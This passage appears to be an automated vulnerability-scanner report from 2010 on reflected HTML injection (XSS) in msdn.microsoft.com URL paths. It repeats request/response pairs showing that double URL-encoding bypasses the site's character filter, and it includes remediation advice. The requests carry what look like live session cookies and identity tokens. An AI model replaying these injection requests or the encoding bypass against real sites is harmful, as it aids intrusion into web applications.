User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usce0fb"><a>210aa7e2390/library/ee663300(VS.85" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4583f%2522%253e%253ca%253e3ce016e5681 was submitted in the REST URL parameter 2. This input was echoed as 4583f"><a>3ce016e5681 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library4583f%2522%253e%253ca%253e3ce016e5681/ee663300(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library4583f"><a>3ce016e5681/ee663300(VS.85" />
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17e66%2522%253e%253ca%253e75a4d87b1f0 was submitted in the REST URL parameter 3. This input was echoed as 17e66"><a>75a4d87b1f0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee663300(VS.8517e66%2522%253e%253ca%253e75a4d87b1f0 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee663300(VS.8517e66"><a>75a4d87b1f0" />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f03f2%2522%253e%253ca%253e020d19f1e98 was submitted in the REST URL parameter 1. This input was echoed as f03f2"><a>020d19f1e98 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usf03f2%2522%253e%253ca%253e020d19f1e98/library/ee663300(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf03f2"><a>020d19f1e98/library/ee663300(VS.85)" />
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d063%2522%253e%253ca%253e98b4bfeb5d1 was submitted in the REST URL parameter 2. This input was echoed as 9d063"><a>98b4bfeb5d1 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9d063%2522%253e%253ca%253e98b4bfeb5d1/ee663300(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9d063"><a>98b4bfeb5d1/ee663300(VS.85)" />
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa396%2522%253e%253ca%253eddc59ddb169 was submitted in the REST URL parameter 3. This input was echoed as fa396"><a>ddc59ddb169 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee663300(VS.85).aspxfa396%2522%253e%253ca%253eddc59ddb169 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee663300(VS.85).aspxfa396"><a>ddc59ddb169" />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b35%2522%253e%253ca%253e93ed8ded15d was submitted in the REST URL parameter 1. This input was echoed as 66b35"><a>93ed8ded15d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us66b35%2522%253e%253ca%253e93ed8ded15d/library/ee702802.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 